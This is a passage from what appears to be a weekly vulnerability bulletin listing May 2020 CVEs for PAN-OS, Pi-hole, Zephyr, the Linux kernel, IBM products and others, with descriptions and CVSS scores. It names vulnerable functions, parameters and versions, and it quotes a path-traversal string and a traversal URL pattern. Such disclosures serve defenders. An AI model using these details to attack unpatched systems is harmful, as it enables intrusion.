  libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows out-of-bounds memory access. 2020-05-11 7.5 CVE-2020-11865
MISC
MISC
MISC libemf -- libemf
  libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows a use-after-free. 2020-05-11 7.5 CVE-2020-11866
MISC
MISC
MISC libexif -- libexif
  exif_entry_get_value in exif-entry.c in libexif 0.6.21 has a divide-by-zero error. 2020-05-09 7.5 CVE-2020-12767
CONFIRM
MLIST openconnect_project -- openconnect_vpn_client
  OpenConnect 8.09 has a buffer overflow, causing a denial of service (application crash) or possibly unspecified other impact, via crafted certificate data to get_cert_name in gnutls.c. 2020-05-12 7.5 CVE-2020-12823
MISC
MISC
MLIST palo_alto_networks -- pan-os
  An authentication bypass vulnerability in Palo Alto Networks PAN-OS Panorama proxy service allows an unauthenticated user with network access to Panorama and the knowledge of the Firewall’s serial number to register the PAN-OS firewall to register the device. After the PAN-OS device is registered, the user can further compromise the PAN-OS instances managed by Panorama. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.0 versions earlier than 8.0.21; PAN-OS 8.1 versions earlier than 8.1.12; PAN-OS 9.0 versions earlier than 9.0.6. 2020-05-13 9.3 CVE-2020-2018
CONFIRM palo_alto_networks -- pan-os
  An external control of path and data vulnerability in the Palo Alto Networks PAN-OS Panorama XSLT processing logic that allows an unauthenticated user with network access to PAN-OS management interface to write attacker supplied file on the system and elevate privileges. This issue affects: All PAN-OS 7.1 Panorama and 8.0 Panorama versions; PAN-OS 8.1 versions earlier than 8.1.12 on Panorama; PAN-OS 9.0 versions earlier than 9.0.6 on Panorama. 2020-05-13 7.5 CVE-2020-2001
CONFIRM palo_alto_networks -- pan-os
  An OS command injection vulnerability in PAN-OS management interface allows an authenticated administrator to execute arbitrary OS commands with root privileges. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.7. 2020-05-13 9 CVE-2020-2010
CONFIRM palo_alto_networks -- pan-os
  An external control of filename vulnerability in the SD WAN component of Palo Alto Networks PAN-OS Panorama allows an authenticated administrator to send a request that results in the creation and write of an arbitrary file on all firewalls managed by the Panorama. In some cases this results in arbitrary code execution with root permissions. This issue affects: All versions of PAN-OS 7.1; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.7. 2020-05-13 9 CVE-2020-2009
CONFIRM palo_alto_networks -- pan-os
  An improper input validation vulnerability in the configuration daemon of Palo Alto Networks PAN-OS Panorama allows for a remote unauthenticated user to send a specifically crafted registration request to the device that causes the configuration service to crash. Repeated attempts to send this request result in denial of service to all PAN-OS Panorama services by restarting the device and putting it into maintenance mode. This issue affects: All versions of PAN-OS 7.1, PAN-OS 8.0; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.7; PAN-OS 9.1 versions earlier than 9.1.0. 2020-05-13 7.8 CVE-2020-2011
CONFIRM palo_alto_networks -- pan-os
  An OS Command Injection vulnerability in PAN-OS management server allows authenticated users to inject and execute arbitrary shell commands with root privileges. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.7. 2020-05-13 9 CVE-2020-2014
CONFIRM palo_alto_networks -- pan-os
  A stack-based buffer overflow vulnerability in the management server component of PAN-OS that allows an authenticated user to potentially execute arbitrary code with root privileges. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.14. 2020-05-13 9 CVE-2020-2006
CONFIRM palo_alto_networks -- pan-os
  An OS command injection vulnerability in the management server component of PAN-OS allows an authenticated user to potentially execute arbitrary commands with root privileges. This issue affects: All PAN-OS 7.1 versions; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.7. 2020-05-13 9 CVE-2020-2007
CONFIRM palo_alto_networks -- pan-os
  An OS command injection and external control of filename vulnerability in Palo Alto Networks PAN-OS allows authenticated administrators to execute code with root privileges or delete arbitrary system files and impact the system's integrity or cause a denial of service condition. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.14. 2020-05-13 9 CVE-2020-2008
CONFIRM palo_alto_networks -- pan-os
  A race condition due to insecure creation of a file in a temporary directory vulnerability in PAN-OS allows for root privilege escalation from a limited linux user account. This allows an attacker who has escaped the restricted shell as a low privilege administrator, possibly by exploiting another vulnerability, to escalate privileges to become root user. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.6; All versions of PAN-OS 8.0. 2020-05-13 8.5 CVE-2020-2016
CONFIRM palo_alto_networks -- pan-os
  An external control of filename vulnerability in the command processing of PAN-OS allows an authenticated administrator to delete arbitrary system files affecting the integrity of the system or causing denial of service to all PAN-OS services. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions before 8.1.14; PAN-OS 9.0 versions before 9.0.7; PAN-OS 9.1 versions before 9.1.1. 2020-05-13 8.5 CVE-2020-2003
CONFIRM palo_alto_networks -- pan-os
  A buffer overflow vulnerability in the PAN-OS management server allows authenticated users to crash system processes or potentially execute arbitrary code with root privileges. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.7; PAN-OS 9.1 versions earlier than 9.1.1; All versions of PAN-OS 8.0. 2020-05-13 9 CVE-2020-2015
CONFIRM pi-hole -- pi-hole
  The Gravity updater in Pi-hole through 4.4 allows an authenticated adversary to upload arbitrary files. This can be abused for Remote Code Execution by writing to a PHP file in the web directory. (Also, it can be used in conjunction with the sudo rule for the www-data user to escalate privileges to root.) The code error is in gravity_DownloadBlocklistFromUrl in gravity.sh. 2020-05-11 9 CVE-2020-11108
MISC
MISC
MISC
MISC ping_identity -- pingid_ssh
  Ping Identity PingID SSH before 4.0.14 contains a heap buffer overflow in PingID-enrolled servers. This condition can be potentially exploited into a Remote Code Execution vector on the authenticating endpoint. 2020-05-13 7.5 CVE-2020-10654
CONFIRM
MISC
MISC
MISC samsung -- multiple_mobile_devices
  An issue was discovered on Samsung mobile devices with O(8.X), P(9.0), and Q(10.0) (Exynos chipsets) software. Attackers can bypass the Secure Bootloader protection mechanism via a heap-based buffer overflow to execute arbitrary code. The Samsung ID is SVE-2020-16712 (May 2020). 2020-05-11 10 CVE-2020-12746
CONFIRM samsung -- multiple_mobile_devices
  An issue was discovered on Samsung mobile devices with Q(10.0) (Exynos980 9630 and Exynos990 9830 chipsets) software. The Bootloader has a heap-based buffer overflow because of the mishandling of specific commands. The Samsung IDs are SVE-2020-16981, SVE-2020-16991 (May 2020). 2020-05-11 7.5 CVE-2020-12747
CONFIRM sap -- business_objects_business_intelligence_platform
  SAP Business Objects Business Intelligence Platform (Live Data Connect), versions 1.0, 2.0, 2.x, allows an attacker to logon on the Central Management Console without password in case of the BIPRWS application server was not protected with some specific certificate, leading to Missing Authentication Check. 2020-05-12 7.5 CVE-2020-6242
MISC
MISC trendnet -- proview_wireless_camera_tv-ip512wn
  TRENDnet ProView Wireless camera TV-IP512WN 1.0R 1.0.4 is vulnerable to an unauthenticated stack-based buffer overflow in handling RTSP packets. This may result in remote code execution or denial of service. The issue is in the binary rtspd (in /sbin) when parsing a long "Authorization: Basic" RTSP header. 2020-05-13 7.5 CVE-2020-12763
MISC vbulletin -- vbulletin
  vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control. 2020-05-08 7.5 CVE-2020-12720
MISC
MISC veritas -- aptare
  Veritas APTARE versions prior to 10.4 included code that bypassed the normal login process when specific authentication credentials were provided to the server. 2020-05-14 7.5 CVE-2020-12874
MISC wordpress -- wordpress
  A blind SQL injection vulnerability is present in Chop Slider 3, a WordPress plugin. The vulnerability is introduced in the id GET parameter supplied to get_script/index.php, and allows an attacker to execute arbitrary SQL queries in the context of the WP database user. 2020-05-08 7.5 CVE-2020-11530
MISC
MISC
FULLDISC
MISC
MISC wordpress -- wordpress
  The simple-file-list plugin before 4.2.8 for WordPress mishandles a .. sequence within a pathname in cases where front-side file management occurs on a non-Linux platform. 2020-05-13 7.5 CVE-2020-12832
MISC
MISC zephyrproject -- zephyr
  A malformed JSON payload that is received from an UpdateHub server may trigger memory corruption in the Zephyr OS. This could result in a denial of service in the best case, or code execution in the worst case. See NCC-NCC-016 This issue affects: zephyrproject-rtos zephyr version 2.1.0 and later versions. version 2.2.0 and later versions. 2020-05-11 7.5 CVE-2020-10022
MISC
MISC
MISC
MISC
MISC zephyrproject -- zephyr
  The arm platform-specific code uses a signed integer comparison when validating system call numbers. An attacker who has obtained code execution within a user thread is able to elevate privileges to that of the kernel. See NCC-ZEP-001 This issue affects: zephyrproject-rtos zephyr version 1.14.0 and later versions. version 2.1.0 and later versions. 2020-05-11 7.2 CVE-2020-10024
MISC
MISC
MISC
MISC
MISC zephyrproject -- zephyr
  An attacker who has obtained code execution within a user thread is able to elevate privileges to that of the kernel. See NCC-ZEP-001 This issue affects: zephyrproject-rtos zephyr version 1.14.0 and later versions. version 2.1.0 and later versions. 2020-05-11 7.2 CVE-2020-10027
MISC
MISC
MISC
MISC
MISC zephyrproject -- zephyr
  A malicious userspace application can cause a integer overflow and bypass security checks performed by system call handlers. The impact would depend on the underlying system call and can range from denial of service to information leak to memory corruption resulting in code execution within the kernel. See NCC-ZEP-005 This issue affects: zephyrproject-rtos zephyr version 1.14.1 and later versions. version 2.1.0 and later versions. 2020-05-11 7.2 CVE-2020-10067
MISC
MISC
MISC
MISC
MISC zoho -- manageengine_datasecurity_plus
  Zoho ManageEngine DataSecurity Plus prior to 6.0.1 uses default admin credentials to communicate with a DataEngine Xnode server. This allows an attacker to bypass authentication for this server and execute all operations in the context of admin user. 2020-05-08 10 CVE-2020-11532
MISC
MISC zulip -- zulip_desktop
  Zulip Desktop before 5.2.0 has Missing SSL Certificate Validation because all validation was inadvertently disabled during an attempt to recognize the ignoreCerts option. 2020-05-09 7.5 CVE-2020-12637
CONFIRM Back to top

 

Medium Vulnerabilities Primary
Vendor -- Product Description Published CVSS Score Source & Patch Info advantech -- webaccess/scada Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. An out-of-bounds vulnerability exists that may allow access to unauthorized data. 2020-05-08 5 CVE-2020-12018
MISC
MISC advantech -- webaccess/scada Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Input is not properly sanitized and may allow an attacker to inject SQL commands. 2020-05-08 5 CVE-2020-12014
MISC
MISC advantech -- webaccess/scada
  Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow an authenticated user to use a specially crafted file to delete files outside the application’s control. 2020-05-08 5.8 CVE-2020-12010
MISC advantech -- webaccess/scada
  Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow a low privilege user to overwrite files outside the application’s control. 2020-05-08 6.5 CVE-2020-12026
MISC
MISC apache -- activemq
  In Apache ActiveMQ 5.0.0 to 5.15.11, the webconsole admin GUI is open to XSS, in the view that lists the contents of a queue. 2020-05-14 4.3 CVE-2020-1941
MISC apache -- rocketmq
  In Apache RocketMQ 4.2.0 to 4.6.0, when the automatic topic creation in the broker is turned on by default, an evil topic like “../../../../topic2020” is sent from rocketmq-client to the broker, a topic folder will be created in the parent directory in brokers, which leads to a directory traversal vulnerability. Users of the affected versions should apply one of the following: Upgrade to Apache RocketMQ 4.6.1 or later. 2020-05-14 5 CVE-2019-17572
MISC
MISC apple -- swiftnio_extras In SwiftNIO Extras before 1.4.1, a logic issue was addressed with improved restrictions. 2020-05-11 5 CVE-2020-9840
MISC appneta -- tcpreplay
  tcprewrite in Tcpreplay through 4.3.2 has a heap-based buffer over-read during a get_c operation. The issue is being triggered in the function get_ipv6_next() at common/get.c. 2020-05-08 6.4 CVE-2020-12740
MISC autoswitch_python_virtualenv -- autoswitch_python_virtualenv In Autoswitch Python Virtualenv before version 0.16.0, a user who enters a directory with a malicious `.venv` file could run arbitrary code without any user interaction. This is fixed in version: 1.16.0 2020-05-13 4.6 CVE-2020-11073
MISC
MISC
MISC
CONFIRM cpanel -- cpanel cPanel before 86.0.14 allows remote attackers to trigger a bandwidth suspension via mail log strings (SEC-505). 2020-05-11 5 CVE-2020-12784
CONFIRM
MISC cpanel -- cpanel
  cPanel before 86.0.14 allows attackers to obtain access to the current working directory via the account backup feature (SEC-540). 2020-05-11 5.5 CVE-2020-12785
CONFIRM
MISC debian -- libemf
  libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows denial of service (issue 1 of 2). 2020-05-11 5 CVE-2020-11863
MISC
MISC
MISC debian -- libemf
  libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows denial of service (issue 2 of 2). 2020-05-11 5 CVE-2020-11864
MISC
MISC
MISC enlightenment -- imlib2 modules/loaders/loader_ico.c in imlib2 1.6.0 has an integer overflow (with resultant invalid memory allocations and out-of-bounds reads) via an icon with many colors in its color map. 2020-05-09 6.4 CVE-2020-12761
CONFIRM exim -- exim
  Exim through 4.93 has an out-of-bounds read in the SPA authenticator that could result in SPA/NTLM authentication bypass in auths/spa.c and auths/auth-spa.c. 2020-05-11 5 CVE-2020-12783
CONFIRM
CONFIRM
CONFIRM
DEBIAN f5 -- big-ip
  In versions 7.1.5-7.1.9, there is use-after-free memory vulnerability in the BIG-IP Edge Client Windows ActiveX component. 2020-05-12 6.8 CVE-2020-5897
MISC f5 -- big-ip_edge_client
  On versions 7.1.5-7.1.9, the BIG-IP Edge Client's Windows Installer Service's temporary folder has weak file and folder permissions. 2020-05-12 4.6 CVE-2020-5896
MISC f5 -- big-ip_edge_client_windows_stonewall
  In versions 7.1.5-7.1.9, BIG-IP Edge Client Windows Stonewall driver does not sanitize the pointer received from the userland. A local user on the Windows client system can send crafted DeviceIoControl requests to \\.\urvpndrv device causing the Windows kernel to crash. 2020-05-12 4.9 CVE-2020-5898
MISC freebsd -- freebsd
  In FreeBSD 12.1-STABLE before r352509, 11.3-STABLE before r352509, and 11.3-RELEASE before p9, an unprivileged local user can trigger a use-after-free situation due to improper checking in SCTP when an application tries to update an SCTP-AUTH shared key. 2020-05-13 4.6 CVE-2019-15878
MISC
CONFIRM freebsd -- freebsd
  In FreeBSD 12.1-STABLE before r356908, 12.1-RELEASE before p5, 11.3-STABLE before r356908, and 11.3-RELEASE before p9, a race condition in the cryptodev module permitted a data structure in the kernel to be used after it was freed, allowing an unprivileged process can overwrite arbitrary kernel memory. 2020-05-13 5.8 CVE-2019-15879
MISC
CONFIRM freebsd -- freebsd
  In FreeBSD 12.1-STABLE before r360973, 12.1-RELEASE before p5, 11.4-STABLE before r360973, 11.4-BETA1 before p1 and 11.3-RELEASE before p9, the FTP packet handler in libalias incorrectly calculates some packet length allowing disclosure of small amounts of kernel (for kernel NAT) or natd process space (for userspace natd). 2020-05-13 5 CVE-2020-7455
MISC
CONFIRM freerdp -- freerdp
  libfreerdp/core/update.c in FreeRDP versions > 1.1 through 2.0.0-rc4 has an Out-of-bounds Read. 2020-05-15 6.4 CVE-2020-11526
MISC
CONFIRM
CONFIRM freerdp -- freerdp
  libfreerdp/gdi/gdi.c in FreeRDP > 1.0 through 2.0.0-rc4 has an Out-of-bounds Read. 2020-05-15 6.4 CVE-2020-11522
MISC
CONFIRM
CONFIRM glpi_project -- glpi
  GLPI before before version 9.4.6 has a vulnerability involving a default encryption key. GLPIKEY is public and is used on every instance. This means anyone can decrypt sensitive data stored using this key. It is possible to change the key before installing GLPI. But on existing instances, data must be reencrypted with the new key. Problem is we can not know which columns or rows in the database are using that; espcially from plugins. Changing the key without updating data would lend in bad password sent from glpi; but storing them again from the UI will work. 2020-05-12 5 CVE-2020-5248
MISC
CONFIRM gnome -- libcroco
  libcroco through 0.6.13 has excessive recursion in cr_parser_parse_any_core in cr-parser.c, leading to stack consumption. 2020-05-12 6.8 CVE-2020-12825
MISC gnuteca -- gnuteca Gnuteca 3.8 allows file.php?folder=/&file= Directory Traversal. 2020-05-09 5 CVE-2020-12764
CONFIRM google -- android In GattServer::SendResponse of gatt_server.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-143231677 2020-05-14 4.6 CVE-2020-0102
MISC google -- android In crus_afe_callback of msm-cirrus-playback.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-139739561 2020-05-14 4.6 CVE-2020-0220
MISC google -- android
  In onKeyguardVisibilityChanged of key_store_service.cpp, there is a missing permission check. This could lead to local escalation of privilege, allowing apps to use keyguard-bound keys when the screen is locked, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10Android ID: A-144285084 2020-05-14 4.6 CVE-2020-0105
MISC google -- android
  In simulatePackageSuspendBroadcast of NotificationManagerService.java, there is a missing permission check. This could lead to local escalation of privilege by creating fake system notifications with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10Android ID: A-148059175 2020-05-14 4.6 CVE-2020-0109
MISC google -- android
  In psi_write of psi.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-148159562References: Upstream kernel 2020-05-14 4.6 CVE-2020-0110
MISC google -- android
  In navigateUpToLocked of ActivityStack.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-8.0 Android-8.1 Android-9Android ID: A-144285917 2020-05-14 4.6 CVE-2020-0098
MISC ibm -- api_connect
  IBM API Connect's V2018.4.1.0 through 2018.4.1.10 management server has an unsecured api which can be exploited by an unauthenticated attacker to obtain sensitive information. IBM X-Force ID: 178322. 2020-05-12 5 CVE-2020-4346
XF
CONFIRM ibm -- i2_intelligent_analysis_platform IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175637. 2020-05-14 6.9 CVE-2020-4258
XF
CONFIRM ibm -- i2_intelligent_analysis_platform IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175635. 2020-05-14 6.9 CVE-2020-4257
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175647. 2020-05-14 6.9 CVE-2020-4264
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175645. 2020-05-14 6.9 CVE-2020-4262
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175648. 2020-05-14 6.9 CVE-2020-4265
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175646. 2020-05-14 6.9 CVE-2020-4263
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175644. 2020-05-14 6.9 CVE-2020-4261
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175649. 2020-05-14 6.9 CVE-2020-4266
XF
CONFIRM ibm -- maximo_asset_management
  IBM Maximo Asset Management 7.6.0, and 7.6.1 could allow an authenticated user to obtain highly sensitive information that they should not normally have access to. IBM X-Force ID: 163998. 2020-05-12 4 CVE-2019-4478
XF
CONFIRM ibm -- sterling_b2b_integrator_standard_edition
  IBM Sterling B2B Integrator Standard Edition 5.2.0.0 trough 6.0.3.1 could allow an authenticated user to obtain sensitive information from a cached web page. IBM X-Force ID: 177089. 2020-05-13 4 CVE-2020-4312
XF
CONFIRM ibm -- sterling_b2b_integrator_standard_edition
  IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.0.3.1 could expose sensitive information to a user through a specially crafted HTTP request. IBM X-Force ID: 176606. 2020-05-14 4 CVE-2020-4299
XF
CONFIRM ibm -- sterling_file_gateway
  IBM Sterling File Gateway 2.2.0.0 through 6.0.3.1 could allow an authenticated user could manipulate cookie information and remove or add modules from the cookie to access functionality not authorized to. IBM X-Force ID: 175638. 2020-05-14 4 CVE-2020-4259
XF
CONFIRM ibm -- urbancode_deploy
  IBM UrbanCode Deploy (UCD) 7.0.5.2 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 171249. 2020-05-11 4.3 CVE-2019-4667
XF
CONFIRM ibm -- websphere_application_server
  IBM WebSphere Application Server 8.5 is vulnerable to server-side request forgery. By sending a specially crafted request, a remote authenticated attacker could exploit this vulnerability to obtain sensitive data. IBM X-Force ID: 178964. 2020-05-14 4 CVE-2020-4365
XF
CONFIRM ispyconnect -- agent_dvr
  iSpyConnect.com Agent DVR before 2.7.1.0 allows directory traversal. 2020-05-15 5 CVE-2020-13093
MISC jooby -- jooby
  All versions before 1.6.7 and all versions after 2.0.0 inclusive and before 2.8.2 of io.jooby:jooby and org.jooby:jooby are vulnerable to Directory Traversal via two separate vectors. 2020-05-11 5 CVE-2020-7647
MISC
MISC
MISC json-c -- json-c
  json-c through 0.14 has an integer overflow and out-of-bounds write via a large JSON file, as demonstrated by printbuf_memappend. 2020-05-09 6.8 CVE-2020-12762
CONFIRM
MISC
FEDORA lg -- multiple_mobile_devices
  An issue was discovered on LG mobile devices with Android OS 7.2, 8.0, 8.1, 9, and 10 software. A crafted application can obtain control of device input via the window system service. The LG ID is LVE-SMP-170011 (May 2020). 2020-05-11 6.8 CVE-2020-12754
CONFIRM libreswan_project -- libreswan
  An out-of-bounds buffer read flaw was found in the pluto daemon of libreswan from versions 3.27 till 3.31 where, an unauthenticated attacker could use this flaw to crash libreswan by sending specially-crafted IKEv1 Informational Exchange packets. The daemon respawns after the crash. 2020-05-12 5 CVE-2020-1763
MISC
CONFIRM
CONFIRM
CONFIRM
DEBIAN

linux -- linux_kernel

An issue was discovered in the Linux kernel before 5.4.17. drivers/spi/spi-dw.c allows attackers to cause a panic via concurrent calls to dw_spi_irq and dw_spi_transfer_one, aka CID-19b61392c5a8. 2020-05-09 4.9 CVE-2020-12769
CONFIRM
CONFIRM
CONFIRM linux -- linux_kernel An issue was discovered in the Linux kernel through 5.6.11. btree_gc_coalesce in drivers/md/bcache/btree.c has a deadlock if a coalescing operation fails. 2020-05-09 4.9 CVE-2020-12771
CONFIRM linux -- linux_kernel
  A signal access-control issue was discovered in the Linux kernel before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in include/linux/sched.h is only 32 bits, an integer overflow can interfere with a do_notify_parent protection mechanism. A child process can send an arbitrary signal to a parent process in a different security domain. Exploitation limitations include the amount of elapsed time before an integer overflow occurs, and the lack of scenarios where signals to a parent process present a substantial operational threat. 2020-05-12 6.9 CVE-2020-12826
CONFIRM
MISC
MISC
MISC
MISC linux -- linux_kernel
  An issue was discovered in the Linux kernel through 5.6.11. sg_write lacks an sg_remove_request call in a certain failure case, aka CID-83c6f2390040. 2020-05-09 4.6 CVE-2020-12770
CONFIRM
FEDORA
CONFIRM linux -- linux_kernel
  There is a use-after-free in kernel versions before 5.5 due to a race condition between the release of ptp_clock and cdev while resource deallocation. When a (high privileged) process allocates a ptp device file (like /dev/ptpX) and voluntarily goes to sleep. During this time if the underlying device is removed, it can cause an exploitable condition as the process wakes up to terminate and clean all attached files. The system crashes due to the cdev structure being invalid (as already freed) which is pointed to by the inode. 2020-05-08 4.4 CVE-2020-10690
CONFIRM linux -- linux_kernel
  The fix for CVE-2019-11599, affecting the Linux kernel before 5.0.10 was not complete. A local user could use this flaw to obtain sensitive information, cause a denial of service, or possibly have other unspecified impacts by triggering a race condition with mmget_not_zero or get_task_mm calls. 2020-05-08 6.9 CVE-2019-14898
MISC
CONFIRM
MISC
MISC
MISC linux -- linux_kernel
  An issue was discovered in the Linux kernel 4.18 through 5.6.11 when unprivileged user namespaces are allowed. A user can create their own PID namespace, and mount a FUSE filesystem. Upon interaction with this FUSE filesystem, if the userspace component is terminated via a kill of the PID namespace's pid 1, it will result in a hung task, and resources being permanently locked up until system reboot. This can result in resource exhaustion. 2020-05-09 4.9 CVE-2019-20794
CONFIRM
CONFIRM maxum_development_corporation -- rumpus
  An issue was discovered in Maxum Rumpus before 8.2.12 on macOS. Authenticated users can perform a path traversal using double escaped characters, enabling read access to arbitrary files on the server. 2020-05-08 4 CVE-2020-12737
MISC
MISC mcafee -- active_response_for_linux
  Privilege Escalation vulnerability in McAfee Active Response (MAR) for Linux prior to 2.4.3 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to. 2020-05-08 4.6 CVE-2020-7290
CONFIRM mcafee -- active_response_for_mac
  Privilege Escalation vulnerability in McAfee Active Response (MAR) for Mac prior to 2.4.3 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to. 2020-05-08 4.6 CVE-2020-7291
CONFIRM mcafee -- active_response_for_windows
  Privilege Escalation vulnerability in McAfee Active Response (MAR) for Windows prior to 2.4.3 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to. 2020-05-08 4.6 CVE-2020-7289
CONFIRM mcafee -- exploit_detection_and_response
  Privilege Escalation vulnerability in McAfee Exploit Detection and Response (EDR) for Mac prior to 3.1.0 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to. 2020-05-08 4.6 CVE-2020-7288
CONFIRM mcafee -- exploit_detection_and_response
  Privilege Escalation vulnerability in McAfee Exploit Detection and Response (EDR) for Windows prior to 3.1.0 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to. 2020-05-08 4.6 CVE-2020-7286
CONFIRM mcafee -- exploit_detection_and_response
  Privilege Escalation vulnerability in McAfee Exploit Detection and Response (EDR) for Linux prior to 3.1.0 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to. 2020-05-08 4.6 CVE-2020-7287
CONFIRM mcafee -- mvision_endpoint Privilege Escalation vulnerability in McAfee MVISION Endpoint prior to 20.5.0.94 allows a malicious script or program to perform functions that the local executing user has not been granted access to. 2020-05-08 4.6 CVE-2020-7285
CONFIRM

netapp -- service_processor_and_baseboard_management_controller

Certain versions of the NetApp Service Processor and Baseboard Management Controller firmware allow a remote unauthenticated attacker to cause a Denial of Service (DoS). 2020-05-11 5 CVE-2019-5500
MISC nextcloud -- nextcloud_groupfolders
  Improper access control in Groupfolders app 4.0.3 allowed to delete hidden directories when when renaming an accessible item to the same name. 2020-05-12 5.5 CVE-2020-8153
MISC
MISC nextcloud -- nextcloud_mail
  A missing verification of the TLS host in Nextcloud Mail 1.1.3 allowed a man in the middle attack. 2020-05-12 6.8 CVE-2020-8156
MISC nextcloud -- nextcloud_server
  An Insecure direct object reference vulnerability in Nextcloud Server 18.0.2 allowed an attacker to remote wipe devices of other users when sending a malicious request directly to the endpoint. 2020-05-12 6.8 CVE-2020-8154
SUSE
SUSE
MISC
MISC opennms -- horizon_and_meridian
  An issue was discovered in OpenNMS Horizon before 26.0.1, and Meridian before 2018.1.19 and 2019 before 2019.1.7. The ActiveMQ channel configuration allowed for arbitrary deserialization of Java objects (aka ActiveMQ Minion payload deserialization), leading to remote code execution for any authenticated channel user regardless of its assigned permissions. 2020-05-11 6.5 CVE-2020-12760
MISC
MISC
MISC
MISC
MISC opto_22 -- softpac_project Opto 22 SoftPAC Project Version 9.6 and prior. SoftPACAgent communicates with SoftPACMonitor over network Port 22000. However, this port is open without any restrictions. This allows an attacker with network access to control the SoftPACAgent service including updating SoftPAC firmware, starting or stopping service, or writing to certain registry values. 2020-05-14 6.4 CVE-2020-10612
MISC opto_22 -- softpac_project
  Opto 22 SoftPAC Project Version 9.6 and prior. Paths specified within the zip files used to update the SoftPAC firmware are not sanitized. As a result, an attacker with user privileges can gain arbitrary file write access with system access. 2020-05-14 4 CVE-2020-12042
MISC opto_22 -- softpac_project
